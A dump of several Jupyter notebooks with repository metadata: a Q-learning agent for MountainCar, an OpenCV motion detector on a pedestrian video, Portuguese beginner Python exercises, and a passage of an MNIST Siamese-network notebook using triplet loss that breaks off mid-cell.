hexsha stringlengths 40 40 | size int64 6 14.9M | ext stringclasses 1 value | lang stringclasses 1 value | max_stars_repo_path stringlengths 6 260 | max_stars_repo_name stringlengths 6 119 | max_stars_repo_head_hexsha stringlengths 40 41 | max_stars_repo_licenses list | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 6 260 | max_issues_repo_name stringlengths 6 119 | max_issues_repo_head_hexsha stringlengths 40 41 | max_issues_repo_licenses list | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 6 260 | max_forks_repo_name stringlengths 6 119 | max_forks_repo_head_hexsha stringlengths 40 41 | max_forks_repo_licenses list | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | avg_line_length float64 2 1.04M | max_line_length int64 2 11.2M | alphanum_fraction float64 0 1 | cells list | cell_types list | cell_type_groups list |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
cb4f67d611db917b50f923090d95e95109a145bf | 120,323 | ipynb | Jupyter Notebook | Mountain car with Q-learning.ipynb | jacobbath/reinforcement-learning | 314d2f6d050a12f7a1d73b73a99d01ef0e1ef75d | [
"MIT"
] | null | null | null | Mountain car with Q-learning.ipynb | jacobbath/reinforcement-learning | 314d2f6d050a12f7a1d73b73a99d01ef0e1ef75d | [
"MIT"
] | null | null | null | Mountain car with Q-learning.ipynb | jacobbath/reinforcement-learning | 314d2f6d050a12f7a1d73b73a99d01ef0e1ef75d | [
"MIT"
] | null | null | null | 148.363748 | 34,536 | 0.803579 | [
[
[
"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys",
"_____no_output_____"
],
[
"env = gym.make('MountainCar-v0')",
"_____no_output_____"
],
[
"LEARNING_RATE = 0.1\nNUM_EPISODES = 500\nDISCOUNT_FACTOR = 0.95",
"_____no_output_____"
],
[
"DISCRETE_OS_SIZE = [20] * len(env.observation_space.high)\ndiscrete_os_win_size = (env.observation_space.high-env.observation_space.low)/DISCRETE_OS_SIZE[0]",
"_____no_output_____"
],
[
"#q_table = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))\nq_table_1 = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))\nq_table_2 = np.random.uniform(low=-2, high=0, size=(DISCRETE_OS_SIZE+[env.action_space.n]))",
"_____no_output_____"
],
[
"def get_discrete_state(state):\n discrete_state = (state-env.observation_space.low)/discrete_os_win_size\n return tuple(discrete_state.astype(np.int))",
"_____no_output_____"
],
[
"def make_epsilon_greedy_policy(epsilon, q_table_1, q_table_2):\n def policy_fn(state):\n q_table_avg = {}\n for i in range(20):\n for j in range(20):\n q_table_avg[(i,j)] = (q_table_1[(i,j)] + q_table_2[(i,j)])/2\n \n actions = q_table_avg[state]\n A = np.ones(len(actions), dtype=float) * (epsilon / len(actions))\n best_action = np.argmax(actions)\n A[best_action] += 1 - epsilon\n \n return A\n return policy_fn",
"_____no_output_____"
],
[
"policy = make_epsilon_greedy_policy(0.05, q_table_1, q_table_2)\nepisode_lengths = [0] * NUM_EPISODES\nepisode_rewards = [0] * NUM_EPISODES\n\nfor i_episode in range(NUM_EPISODES):\n state = env.reset()\n done = False \n if (i_episode+1) % 100 == 0:\n print('\\r', i_episode+1, end='')\n sys.stdout.flush()\n while not done: \n #if i_episode % 100 == 0:\n # env.render()\n discrete_state = get_discrete_state(state)\n action_probs = policy(discrete_state)\n action = np.random.choice(np.arange(len(action_probs)), p=action_probs)\n next_state, reward, done, _ = env.step(action)\n episode_lengths[i_episode] += 1\n episode_rewards[i_episode] += reward\n if not done:\n discrete_next_state = get_discrete_state(next_state)\n if np.random.random() > 0.5:\n best_next_q_value = q_table_2[discrete_next_state][np.argmax(q_table_1[discrete_next_state])]\n target = reward + DISCOUNT_FACTOR * best_next_q_value\n q_table_1[discrete_state][action] += LEARNING_RATE * (target - q_table_1[discrete_state][action])\n else:\n best_next_q_value = q_table_1[discrete_next_state][np.argmax(q_table_2[discrete_next_state])]\n target = reward + DISCOUNT_FACTOR * best_next_q_value\n q_table_2[discrete_state][action] += LEARNING_RATE * (target - q_table_2[discrete_state][action])\n \n elif next_state[0] >= env.goal_position:\n q_table_1[discrete_state][action] = 0\n q_table_2[discrete_state][action] = 0\n \n state = next_state ",
" 500"
],
[
"# Use this with the trainining function from DQN-file\nclass QAgent:\n def __init__(self, env):\n self.epsilon = 0.5\n self.epsilon_max = 0.5\n self.epsilon_min = 0.1\n self.epsilon_decay = (self.epsilon_max - self.epsilon_min) / 1000\n self.discount_factor = 0.95\n self.learning_rate = 0.1\n self.state_size = len(env.observation_space.high)\n self.action_size = env.action_space.n\n self.discrete_table_size = 20\n self.q_table = self.build_model()\n \n def build_model(self):\n table_size = [self.discrete_table_size] * self.state_size\n q_table = np.random.uniform(low=-2, high=0, size=(table_size+[self.action_size]))\n return q_table\n \n def get_discrete_state(self, state):\n normalized_state = (state - env.observation_space.low) / (env.observation_space.high - env.observation_space.low)\n rescaled_state = normalized_state * self.discrete_table_size\n return tuple(rescaled_state.astype(np.int))\n \n def act(self, state):\n if self.epsilon_max >= self.epsilon >= self.epsilon_min:\n self.epsilon -= self.epsilon_decay\n discrete_state = self.get_discrete_state(state)\n if np.random.random() > self.epsilon:\n q_values = self.q_table[discrete_state]\n return np.argmax(q_values)\n else:\n return np.random.choice(np.arange(self.action_size))\n \n def update(self, state, action, reward, next_state, done):\n discrete_state = self.get_discrete_state(state)\n if next_state[0] >= env.goal_position:\n self.q_table[discrete_state][action] = 0\n else:\n discrete_next_state = self.get_discrete_state(next_state)\n best_next_q_value = np.max(self.q_table[discrete_next_state])\n target = reward + self.discount_factor * best_next_q_value\n self.q_table[discrete_state][action] += self.learning_rate * (target - self.q_table[discrete_state][action])",
"_____no_output_____"
],
[
"x_double = np.convolve(episode_rewards, np.ones((20,))/20, mode='valid')\nfig = plt.plot(x_double)\nplt.show()",
"_____no_output_____"
],
[
"x = np.convolve(episode_rewards, np.ones((20,))/20, mode='valid')",
"_____no_output_____"
],
[
"fig = plt.plot(x)\nplt.show()",
"_____no_output_____"
],
[
"fig = plt.figure()\nax = plt.axes(projection='3d')\nx = np.arange(20)\ny = np.arange(20)\nX, Y = np.meshgrid(x, y)\nax.plot_wireframe(X, Y, q_table, color='green')\nplt.show()\n",
"_____no_output_____"
],
[
"q_table_avg = {}\nfor i in range(20):\n for j in range(20):\n q_table_avg[(i,j)] = (q_table_1[(i,j)] + q_table_2[(i,j)])/2\n",
"_____no_output_____"
],
[
"q_table_avg",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb4f72e237140a5a68eb7f7477804d1f11485966 | 5,529 | ipynb | Jupyter Notebook | 4_Pedestrian_Detection.ipynb | gabaugusto/python-with-opencv | 0d11533adfd0a8749b1fb71f4e5a39e6ce5a1699 | [
"MIT"
] | 1 | 2022-03-08T11:11:12.000Z | 2022-03-08T11:11:12.000Z | 4_Pedestrian_Detection.ipynb | gabaugusto/python-with-opencv | 0d11533adfd0a8749b1fb71f4e5a39e6ce5a1699 | [
"MIT"
] | null | null | null | 4_Pedestrian_Detection.ipynb | gabaugusto/python-with-opencv | 0d11533adfd0a8749b1fb71f4e5a39e6ce5a1699 | [
"MIT"
] | null | null | null | 23.0375 | 123 | 0.420872 | [
[
[
"# Python Blink Counter \n\n__En__: \n\n__PT__: ",
"_____no_output_____"
]
],
[
[
"import cv2\nimport numpy as np",
"_____no_output_____"
],
[
"cap = cv2.VideoCapture('videos/people.mp4')\nframe_width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nframe_height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))",
"_____no_output_____"
],
[
"fourcc = cv2.VideoWriter_fourcc('X', 'V', 'I', 'D')",
"_____no_output_____"
],
[
"out = cv2.VideoWriter('videos/output.avi', fourcc, 5.0, (1280, 720))",
"_____no_output_____"
],
[
"ret, frame1 = cap.read()\nret, frame2 = cap.read()\n\nprint(frame1)\nprint(frame2)",
"[[[126 126 126]\n [128 128 128]\n [128 128 128]\n ...\n [147 150 148]\n [148 151 149]\n [148 151 149]]\n\n [[126 126 126]\n [128 128 128]\n [128 128 128]\n ...\n [147 150 148]\n [148 151 149]\n [148 151 149]]\n\n [[126 126 126]\n [126 126 126]\n [128 128 128]\n ...\n [147 150 148]\n [147 150 148]\n [148 151 149]]\n\n ...\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [229 229 229]\n [229 229 229]\n [229 229 229]]\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [229 229 229]\n [229 229 229]\n [229 229 229]]\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [229 229 229]\n [229 229 229]\n [229 229 229]]]\n[[[126 126 126]\n [128 128 128]\n [128 128 128]\n ...\n [147 150 148]\n [148 151 149]\n [148 151 149]]\n\n [[126 126 126]\n [128 128 128]\n [128 128 128]\n ...\n [147 150 148]\n [148 151 149]\n [148 151 149]]\n\n [[126 126 126]\n [126 126 126]\n [128 128 128]\n ...\n [147 150 148]\n [147 150 148]\n [148 151 149]]\n\n ...\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [230 230 230]\n [230 230 230]\n [230 230 230]]\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [230 230 230]\n [230 230 230]\n [230 230 230]]\n\n [[199 202 200]\n [199 202 200]\n [199 202 200]\n ...\n [230 230 230]\n [230 230 230]\n [230 230 230]]]\n"
],
[
"while cap.isOpened():\n diff = cv2.absdiff(frame1, frame2)\n gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (5,5), 0)\n _, thresh = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)\n \n dilated = cv2.dilate(thresh, None, iterations=3)\n contours, _ = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n \n for contour in contours:\n (x, y, w, h) = cv2.boundingRect(contour)\n \n if cv2.contourArea(contour) < 900:\n continue\n \n cv2.rectangle(frame1, (x, y), (x+w, y+h), (0, 255, 0), 2)\n cv2.putText(frame1, \"Status: {}\".format('Movement'), (10 , 20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 3)\n \n image = cv2.resize(frame1, (1280,720))\n out.write(image)\n cv2.imshow(\"feed\", frame1)\n frame1 = frame2\n ret, frame2 = cap.read()\n \n if cv2.waitKey(40) == 27:\n break\n ",
"_____no_output_____"
],
[
"cv2.destroyAllWindows()\ncap.release()\nout.release()",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb4f8e1a3abde580aed4db2d82488b5dd596b990 | 13,994 | ipynb | Jupyter Notebook | Exercicio01.ipynb | janainaemilia/LingProg | d74ecd739e93f564f03c98cccbad72aa60032dbe | [
"MIT"
] | null | null | null | Exercicio01.ipynb | janainaemilia/LingProg | d74ecd739e93f564f03c98cccbad72aa60032dbe | [
"MIT"
] | null | null | null | Exercicio01.ipynb | janainaemilia/LingProg | d74ecd739e93f564f03c98cccbad72aa60032dbe | [
"MIT"
] | null | null | null | 28.443089 | 511 | 0.555381 | [
[
[
"## Exercício 01\n### Linguagens e Paradigmas de Programação\n\nJanaina Emilia\n<br /> <b>RA</b> 816114781",
"_____no_output_____"
],
[
"1- Faça um Programa que peça o raio de um círculo, calcule e\nmostre sua área.",
"_____no_output_____"
]
],
[
[
"import math\n\nraio = float(input(\"Digite o valor do raio:\"))\narea = math.pi * (raio ** 2)\n\nprint(\"A área do circulo é: \", area)",
"Digite o valor do raio:5.5\nA área do circulo é: 95.03317777109125\n"
]
],
[
[
"2- Faça um Programa que calcule a área de um quadrado, em\nseguida mostre o dobro desta área para o usuário.",
"_____no_output_____"
]
],
[
[
"base = float(input(\"Digite o valor da base:\"))\naltura = float(input(\"Digite o valor da altura:\"))\narea = (base * altura)\n\nprint(\"O dobro da área do quadrado é: \", area*2)",
"Digite o valor da base:5\nDigite o valor da altura:8\nO dobro da área do quadrado é: 80.0\n"
]
],
[
[
"3- Faça um Programa que pergunte quanto você ganha por hora e o\nnúmero de horas trabalhadas no mês. Calcule e mostre o total do\nseu salário no referido mês.",
"_____no_output_____"
]
],
[
[
"valor_hora = float(input(\"Quanto você ganha por hora?\"))\nhoras_mes = float(input(\"Quantas horas você trabalha por mês?\"))\n\nsalario = valor_hora * horas_mes\n\nprint(\"Seu salário mensal é: \", salario)",
"Quanto você ganha por hora?5\nQuantas horas você trabalha por mês?100\nSeu salário mensal é: 500.0\n"
]
],
[
[
"4- Faça um Programa que peça a temperatura em graus Farenheit,\ntransforme e mostre a temperatura em graus Celsius. C = (5 * (F-\n328 / 98.",
"_____no_output_____"
]
],
[
[
"temperatura_f = float(input(\"Digite uma temperatura em Farenheit:\"))\ntemperatura_c = (5 * (temperatura_f - 32)) / 9\n\nprint(\"A temperatura em Celcius é: \", temperatura_c)",
"Digite uma temperatura em Farenheit:15\nA temperatura em Celcius é: -9.444444444444445\n"
]
],
[
[
"5- Faça um Programa que peça a temperatura em graus Celsius,\ntransforme e mostre em graus Farenheit.",
"_____no_output_____"
]
],
[
[
"temperatura_c = float(input(\"Digite uma temperatura em Celsius:\"))\ntemperatura_f = ((temperatura_c / 5) * 9) + 32\n\nprint(\"A temperatura em Farenheit é: \", temperatura_f)",
"Digite uma temperatura em Celsius:40\nA temperatura em Farenheit é: 104.0\n"
]
],
[
[
"6- Faça um Programa que peça 2 números inteiros e um número\nreal. Calcule e mostre:\n- o produto do dobro do primeiro com metade do segundo .\n- a soma do triplo do primeiro com o terceiro.\n- o terceiro elevado ao cubo.",
"_____no_output_____"
]
],
[
[
"a = int(input(\"Digite o valor de A:\"))\nb = int(input(\"Digite o valor de B:\"))\nc = float(input(\"Digite o valor de C:\"))\n\nprint(\"O produto do dobro do primeiro com metade do segundo:\", (a * 2) * (b / 2))\nprint(\"A soma do triplo do primeiro com o terceiro\", (a * 3) + c)\nprint(\"O terceiro elevado ao cubo\", c ** 3)",
"Digite o valor de A:2\nDigite o valor de B:3\nDigite o valor de C:4\nO produto do dobro do primeiro com metade do segundo: 6.0\nA soma do triplo do primeiro com o terceiro 10.0\nO terceiro elevado ao cubo 64.0\n"
]
],
[
[
"7- João Papo-de-Pescador, homem de bem, comprou um microcomputador para controlar o rendimento diário de seu trabalho. Toda vez que ele traz um peso de peixes maior que o estabelecido pelo regulamento de pesca do estado de São Paulo (50 quilos) deve pagar uma multa de R$ 4,00 por quilo excedente. João precisa que você faça um programa que leia a variável peso (peso de peixes) e verifque se há excesso. Se houver, gravar na variável excesso e na variável multa o valor da multa que João deverá pagar.\nCaso contrário mostrar tais variáveis com o conteúdo ZERO.",
"_____no_output_____"
]
],
[
[
"peso = float(input(\"Informe o peso:\"))\nexcesso = 0\nmulta = 0\n\nif(peso > 50):\n excesso = peso - 50\n gramas = excesso - int(excesso)\n multa = excesso * 4\n\nprint(\"Peso excedido: \", excesso)\nprint(\"Valor da multa: \", multa)",
"Informe o peso:55.5\nPeso excedido: 5.5\nValor da multa: 22.0\n"
]
],
[
[
"8- Faça um Programa que pergunte quanto você ganha por hora e o\nnúmero de horas trabalhadas no mês. Calcule e mostre o total do\nseu salário no referido mês, sabendo-se que são descontados 11%\npara o Imposto de Renda, 8% para o INSS e 5% para o sindicato,\nfaça um programa que nos dê:\n- salário bruto.\n- quanto pagou ao INSS.\n- quanto pagou ao sindicato.\n- o salário líquido.\n- calcule os descontos e o salário líquido, conforme a tabela abaixo\n+Salário Bruto:R$\n-IR (11%):R$\n-INSS (8%):R$\n-Sindicato (5):R$\n=Salário Liquido:R$\nObs.: Salário Bruto - Descontos = Salário Líquido.",
"_____no_output_____"
]
],
[
[
"valor_hora = float(input(\"Quanto você ganha por hora?\"))\nhoras_mes = float(input(\"Quantas horas você trabalha por mês?\"))\n\nsalario_bruto = valor_hora * horas_mes\nimposto_de_renda = salario_bruto * 0.11\ninss = salario_bruto * 0.08\nsindicato = salario_bruto * 0.05\n\nsalario_liquido = salario_bruto - (imposto_de_renda + inss + sindicato)\n\nprint(\"Seu salário bruto mensal é: \", salario_bruto)\nprint(\"Valor do Imposto de Renda: \", imposto_de_renda)\nprint(\"Valor do INSS: \", inss)\nprint(\"Valor do Sindicato: \", sindicato)\nprint(\"Seu salário liquido mensal é: \", salario_liquido)\n",
"Quanto você ganha por hora?40\nQuantas horas você trabalha por mês?100\nSeu salário bruto mensal é: 4000.0\nValor do Imposto de Renda: 440.0\nValor do INSS: 320.0\nValor do Sindicato: 200.0\nSeu salário liquido mensal é: 3040.0\n"
]
],
[
[
"9- Faça um programa que leia 2 strings e informe o conteúdo delas\nseguido do seu comprimento. Informe também se as duas strings\npossuem o mesmo comprimento e são iguais ou diferentes no\nconteúdo.\nExemplo:\nString 1: Brasil Hexa 2018\nString 2: Brasil! Hexa 2018!\nTamanho de \"Brasil Hexa 2018\": 16 caracteres\nTamanho de \"Brasil! Hexa 2018!\": 18 caracteres\nAs duas strings são de tamanhos diferentes.\nAs duas strings possuem conteúdo diferente.",
"_____no_output_____"
]
],
[
[
"string_a = input(\"Digite a primeira frase: \")\nstring_b = input(\"Digite a segunda frase: \")\n\nprint(\"String 1: \", string_a)\nprint(\"String 2: \", string_b)\n\nprint(\"Tamanho de \" + string_a + \": \", len(string_a))\nprint(\"Tamanho de \" + string_b + \": \", len(string_b))\n\nif(len(string_a) == len(string_b)):\n print(\"As duas strings tem o mesmo tamanho.\")\nelse:\n print(\"As duas strings tem tamanho diferente.\")\n\nif(string_a == string_b):\n print(\"As duas strings possuem o mesmo conteúdo.\")\nelse:\n print(\"As duas strings possuem conteúdo diferente.\")",
"Digite a primeira frase: Ola mundo\nDigite a segunda frase: Olá Mundo!\nString 1: Ola mundo\nString 2: Olá Mundo!\nTamanho de Ola mundo: 9\nTamanho de Olá Mundo!: 10\nAs duas strings tem tamanho diferente.\nAs duas strings possuem conteúdo diferente.\n"
]
],
[
[
"10- Faça um programa que permita ao usuário digitar o seu nome e\nem seguida mostre o nome do usuário de trás para frente utilizando\nsomente letras maiúsculas. Dica: lembre−se que ao informar o\nnome o usuário pode digitar letras maiúsculas ou minúsculas.\nObservação: não use loops.",
"_____no_output_____"
]
],
[
[
"username = input(\"Digite seu nome:\")\nprint(username[::-1].upper())",
"Digite seu nome:Janaina\nANIANAJ\n"
]
],
[
[
"11- Faça um programa que solicite a data de nascimento\n(dd/mm/aaaa) do usuário e imprima a data com o nome do mês por\nextenso.\nData de Nascimento: 29/10/1973\nVocê nasceu em 29 de Outubro de 1973.\nObs.: Não use desvio condicional nem loops.",
"_____no_output_____"
]
],
[
[
"import locale\nfrom datetime import date\nlocale.setlocale(locale.LC_TIME, 'portuguese_brazil')\n\ndata_nascimento = input(\"Informe a data de nascimento: (dd/mm/aa)\").split(\"/\")\ndata = date(day=int(data_nascimento[0]), month=int(data_nascimento[1]), year=int(data_nascimento[2]))\n\nstr = data.strftime('%A %d de %B de %Y')\n\nprint(\"Você nasceu em\", str)",
"Informe a data de nascimento: (dd/mm/aa)03/06/1997\nVocê nasceu em terça-feira 03 de junho de 1997\n"
]
],
[
[
"12- Leet é uma forma de se escrever o alfabeto latino usando outros\nsímbolos em lugar das letras, como números por exemplo. A própria\npalavra leet admite muitas variações, como l33t ou 1337. O uso do\nleet reflete uma subcultura relacionada ao mundo dos jogos de\ncomputador e internet, sendo muito usada para confundir os\niniciantes e afrmar-se como parte de um grupo. Pesquise sobre as\nprincipais formas de traduzir as letras. Depois, faça um programa\nque peça uma texto e transforme-o para a grafa leet speak.\nDesafo: não use loops nem desvios condicionais.",
"_____no_output_____"
]
],
[
[
"string = input(\"Digite um texto qualquer: \")\n \ntranslation = {\"a\": \"4\", \"A\": \"4\", \"e\": \"3\", \"E\": \"3\", \"i\": \"1\", \"I\": \"1\", \"o\": \"0\", \"O\": \"0\", \"t\": \"7\", \"T\": \"7\", \"s\": '5', \"S\": '5'}\n\nstring = string.translate(str.maketrans(translation))\n\nprint(string)",
"Digite um texto qualquer: Leet is pretty\nL337 15 pr377y\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb4f9a4b16b8b837510d41076341c522e40efe0d | 395,554 | ipynb | Jupyter Notebook | Siamese-Neural-Network-MNIST.ipynb | Trotts/Siamese-Neural-Network-MNIST-Triplet-Loss | 13d0524339539cb2b6b4382875dd1b8caae77c26 | [
"MIT"
] | 12 | 2021-02-20T08:43:01.000Z | 2022-03-31T11:20:23.000Z | Siamese-Neural-Network-MNIST.ipynb | Trotts/Siamese-Neural-Network-MNIST-Triplet-Loss | 13d0524339539cb2b6b4382875dd1b8caae77c26 | [
"MIT"
] | 2 | 2021-05-21T06:12:56.000Z | 2022-02-04T08:55:17.000Z | Siamese-Neural-Network-MNIST.ipynb | Trotts/Siamese-Neural-Network-MNIST-Triplet-Loss | 13d0524339539cb2b6b4382875dd1b8caae77c26 | [
"MIT"
] | 2 | 2022-02-17T21:35:36.000Z | 2022-03-12T07:22:09.000Z | 219.264967 | 90,036 | 0.874664 | [
[
[
"# Siamese Neural Network with Triplet Loss trained on MNIST\n## Cameron Trotter\n### [email protected]\n\nThis notebook builds an SNN to determine similarity scores between MNIST digits using a triplet loss function. The use of class prototypes at inference time is also explored. \n\nThis notebook is based heavily on the approach described in [this Coursera course](https://www.coursera.org/learn/siamese-network-triplet-loss-keras/), which in turn is based on the [FaceNet](https://arxiv.org/abs/1503.03832) paper. Any uses of open-source code are linked throughout where utilised. \n\nFor an in-depth guide to understand this code, and the theory behind it, please see LINK.\n",
"_____no_output_____"
],
[
"### Imports",
"_____no_output_____"
]
],
[
[
"# TF 1.14 gives lots of warnings for deprecations ready for the switch to TF 2.0\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport os\nimport glob\n\nfrom datetime import datetime\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.callbacks import Callback, CSVLogger, ModelCheckpoint\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.layers import Activation, Input, concatenate\nfrom tensorflow.keras.layers import Layer, BatchNormalization, MaxPooling2D, Concatenate, Lambda, Flatten, Dense\nfrom tensorflow.keras.initializers import glorot_uniform, he_uniform\nfrom tensorflow.keras.regularizers import l2\nfrom tensorflow.keras.utils import multi_gpu_model\n\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import roc_curve, roc_auc_score\nimport math\nfrom pylab import dist\nimport json\n\nfrom tensorflow.python.client import device_lib\nimport matplotlib.gridspec as gridspec",
"_____no_output_____"
]
],
[
[
"## Import the data and reshape for use with the SNN\n\nThe data loaded in must be in the same format as `tf.keras.datasets.mnist.load_data()`, that is `(x_train, y_train), (x_test, y_test)`",
"_____no_output_____"
]
],
[
[
"(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\nnum_classes = len(np.unique(y_train))\n\nx_train_w = x_train.shape[1] # (60000, 28, 28)\nx_train_h = x_train.shape[2]\nx_test_w = x_test.shape[1]\nx_test_h = x_test.shape[2]\n\nx_train_w_h = x_train_w * x_train_h # 28 * 28 = 784\nx_test_w_h = x_test_w * x_test_h\n\nx_train = np.reshape(x_train, (x_train.shape[0], x_train_w_h))/255. # (60000, 784)\nx_test = np.reshape(x_test, (x_test.shape[0], x_test_w_h))/255.",
"_____no_output_____"
]
],
[
[
"### Plotting the triplets",
"_____no_output_____"
]
],
[
[
"def plot_triplets(examples):\n plt.figure(figsize=(6, 2))\n for i in range(3):\n plt.subplot(1, 3, 1 + i)\n plt.imshow(np.reshape(examples[i], (x_train_w, x_train_h)), cmap='binary')\n plt.xticks([])\n plt.yticks([])\n plt.show()\n \nplot_triplets([x_train[0], x_train[1], x_train[2]])",
"_____no_output_____"
]
],
[
[
"### Create triplet batches\n\nRandom batches are generated by `create_batch`. Semi-hard triplet batches are generated by `create_batch_hard`.\n\nSemi-Hard: dist(A, P) < dist(A, N) < dist(A, P) + margin. Using only easy triplets will lead to no learning. Hard triplets generate high loss and have high impact on training parameters, but may cause any mislabelled data to cause too much of a weight change. ",
"_____no_output_____"
]
],
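The semi-hard condition described above can be made concrete with a small, self-contained sketch (not part of the original notebook). The `margin` of 0.2 mirrors the `alpha` hyperparameter used later, and the embedding vectors here are made-up values purely for illustration.

```python
import numpy as np

def triplet_difficulty(anchor, positive, negative, margin=0.2):
    """Classify a triplet of embeddings as 'easy', 'semi-hard' or 'hard'."""
    d_ap = np.sum(np.square(anchor - positive))  # squared distance anchor-positive
    d_an = np.sum(np.square(anchor - negative))  # squared distance anchor-negative
    if d_an > d_ap + margin:
        return "easy"       # negative is already far enough away: loss is zero
    if d_ap < d_an:
        return "semi-hard"  # negative further than positive, but inside the margin
    return "hard"           # negative closer to the anchor than the positive

# Made-up 2-D embeddings for illustration
a, p, n = np.array([0.0, 0.0]), np.array([0.3, 0.0]), np.array([0.4, 0.0])
print(triplet_difficulty(a, p, n))  # -> 'semi-hard' (0.09 < 0.16 <= 0.09 + 0.2)
```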
[
[
"def create_batch(batch_size=256, split = \"train\"):\n x_anchors = np.zeros((batch_size, x_train_w_h))\n x_positives = np.zeros((batch_size, x_train_w_h))\n x_negatives = np.zeros((batch_size, x_train_w_h))\n \n if split ==\"train\":\n data = x_train\n data_y = y_train\n else:\n data = x_test\n data_y = y_test\n \n for i in range(0, batch_size):\n # We need to find an anchor, a positive example and a negative example\n random_index = random.randint(0, data.shape[0] - 1)\n x_anchor = data[random_index]\n y = data_y[random_index]\n \n indices_for_pos = np.squeeze(np.where(data_y == y))\n indices_for_neg = np.squeeze(np.where(data_y != y))\n \n x_positive = data[indices_for_pos[random.randint(0, len(indices_for_pos) - 1)]]\n x_negative = data[indices_for_neg[random.randint(0, len(indices_for_neg) - 1)]]\n \n x_anchors[i] = x_anchor\n x_positives[i] = x_positive\n x_negatives[i] = x_negative\n \n return [x_anchors, x_positives, x_negatives]\n\n\ndef create_hard_batch(batch_size, num_hard, split = \"train\"):\n \n x_anchors = np.zeros((batch_size, x_train_w_h))\n x_positives = np.zeros((batch_size, x_train_w_h))\n x_negatives = np.zeros((batch_size, x_train_w_h))\n \n if split ==\"train\":\n data = x_train\n data_y = y_train\n else:\n data = x_test\n data_y = y_test\n \n # Generate num_hard number of hard examples:\n hard_batches = [] \n batch_losses = []\n \n rand_batches = []\n \n # Get some random batches\n for i in range(0, batch_size):\n hard_batches.append(create_batch(1, split))\n \n A_emb = embedding_model.predict(hard_batches[i][0])\n P_emb = embedding_model.predict(hard_batches[i][1])\n N_emb = embedding_model.predict(hard_batches[i][2])\n \n # Compute d(A, P) - d(A, N) for each selected batch\n batch_losses.append(np.sum(np.square(A_emb-P_emb),axis=1) - np.sum(np.square(A_emb-N_emb),axis=1))\n \n # Sort batch_loss by distance, highest first, and keep num_hard of them\n hard_batch_selections = [x for _, x in sorted(zip(batch_losses,hard_batches), key=lambda x: x[0])]\n hard_batches = hard_batch_selections[:num_hard]\n \n # Get batch_size - num_hard number of random examples\n num_rand = batch_size - num_hard\n for i in range(0, num_rand):\n rand_batch = create_batch(1, split)\n rand_batches.append(rand_batch)\n \n selections = hard_batches + rand_batches\n \n for i in range(0, len(selections)):\n x_anchors[i] = selections[i][0]\n x_positives[i] = selections[i][1]\n x_negatives[i] = selections[i][2]\n \n return [x_anchors, x_positives, x_negatives]\n \n ",
"_____no_output_____"
]
],
[
[
"### Create the Embedding Model\n\nThis model takes in input image and generates some `emb_size`-dimensional embedding for the image, plotted on some latent space.\n\nThe untrained model's embedding space is stored for later use when comparing clustering between the untrained and the trained model using PCA, based on [this notebook](https://github.com/AdrianUng/keras-triplet-loss-mnist/blob/master/Triplet_loss_KERAS_semi_hard_from_TF.ipynb).",
"_____no_output_____"
]
],
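As a companion to the PCA comparison mentioned above, here is a minimal sketch (not from the original notebook) of how a stored 2-D decomposition such as `decomposed_embeddings_before` could be plotted, coloured by digit label. It assumes the variables created in the training-setup cell further down (`decomposed_embeddings_before`, `y_test`, `num_vis`).

```python
import numpy as np
import matplotlib.pyplot as plt

def plot_decomposed_embeddings(decomposed, labels, title):
    """Scatter a 2-D PCA decomposition of the embeddings, coloured by class label."""
    plt.figure(figsize=(8, 6))
    for c in np.unique(labels):
        idx = np.where(labels == c)[0]
        plt.scatter(decomposed[idx, 0], decomposed[idx, 1], s=8, label=str(c))
    plt.legend(title="Digit")
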